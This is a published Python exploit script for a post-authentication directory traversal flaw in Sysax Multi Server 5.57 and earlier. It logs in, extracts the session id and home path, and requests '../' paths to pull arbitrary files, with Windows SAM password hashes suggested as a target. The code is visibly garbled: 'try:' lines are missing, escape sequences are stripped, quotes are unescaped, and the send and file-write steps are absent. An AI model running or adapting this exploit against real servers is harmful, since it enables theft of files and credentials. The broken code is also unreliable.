# Title : Sysax <= 5.57 Directory Traversal
# Published : 2012-04-03
# Author :
#Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit
#Date Discovered: March 27, 2012
#Vendor Contacted: March 29, 2012
#Vendor Response: April 3, 2012	
#Vendor Fixed: (Currently working on fix, check my site for update)
#Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html

import socket,sys,time,re,base64,urllib

def main():
	#base64 encode the provided creds
	creds = base64.encodestring(user+"x0a"+password)

	print "n"
	print "****************************************************************************"
	print "       Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)      "
	print "     	  	         by @cd1zz www.pwnag3.com                          "
	print "	        Getting "+getfile+" from " + target + " on port " + str(port) 
	print "****************************************************************************"

	#setup post for login
	login = "POST /scgi?sid=0&pid=dologin HTTP/1.1rn"
	login += "Host: rn"
	login += "http://"+target+"/scgi?sid=0&pid=dologinrn"
	login += "Content-Type: application/x-www-form-urlencodedrn"
	login += "Content-Length: 15rnrn"
	login += "fd="+creds+"nn"

	#send post and login creds
		r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		r.connect((target, port))
		print "[*] Logging in"
	except Exception, e:
		print "[-] Could not login"
		print e
	#loop the recv sock so we get the full page
	page = ''	
	fullpage = ''	
	while "</html>" not in fullpage:
		page = r.recv(4096)
		fullpage += page

	#regex the sid from the page
	global sid
	sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
	if sid is None:
		print "[x] Could not login. User and pass correct?"

	#regex to find user's path
	print "[*] Finding your home path"
	global path
	path = re.search(r'file=[a-zA-Z]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',fullpage,re.M)

	#if that doesn't work, try to upload a file and check again
	if path is None:
		print "[-] No files found, I will try to upload one for you."
		print "[-] If you don't have rights to do this, it will fail."

		upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1rn"
		upload += "Host:rn"
		upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620rn"
		upload += "Content-Length: 219rnrn"
		upload += "-----------------------------97336096252362005297691620rn"
		upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt"rn"
		upload += "Content-Type: text/plainrn"
		upload += "-----------------------------97336096252362005297691620--rnrn"

		u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		u.connect((target, port))
		u.send(upload + "rn")
		page = ''
		fullpage = ''	
		while "</html>" not in fullpage:
			page = u.recv(4096)
			fullpage += page
		path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',fullpage,re.M)
		if path is None:
			print "n[x] It failed, you probably don't have rights to upload."
			print "[x] Please retry the script a few times."
			print "[x] You need at least one file in the directory because we need" 
			print "[x] to append our directory traversal to the end of your path."
	print "[+] Got it => " + path.group(0) 

def dirtrav():
	#here is the dir trav 
	url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile
		retrieved_file = urllib.urlopen(url)
		filename = raw_input("[+] Got your file. What file name do you want to save it as?  ")
		output = open(filename,'wb')
		print "[*] Done!"
	except Exception, e:
		print "[x] Either the file doesn't exist or you mistyped it. Error below:"
		print "[x] You can also try to browse this site manually:"
		print "[x] " + url
		print e

def keepgoing():
	cont = raw_input("[*] Do you want another file (y/n)? ")
	while cont == "y":
		global getfile
		getfile = raw_input("[*] Enter the location of the new file: ")
		cont = raw_input("[*] Do you want another file (y/n)? ")
if __name__ == '__main__':
	if len(sys.argv) != 6:
		print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>"
		print "[+] File examples => windows/repair/sam or boot.ini"

	target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5]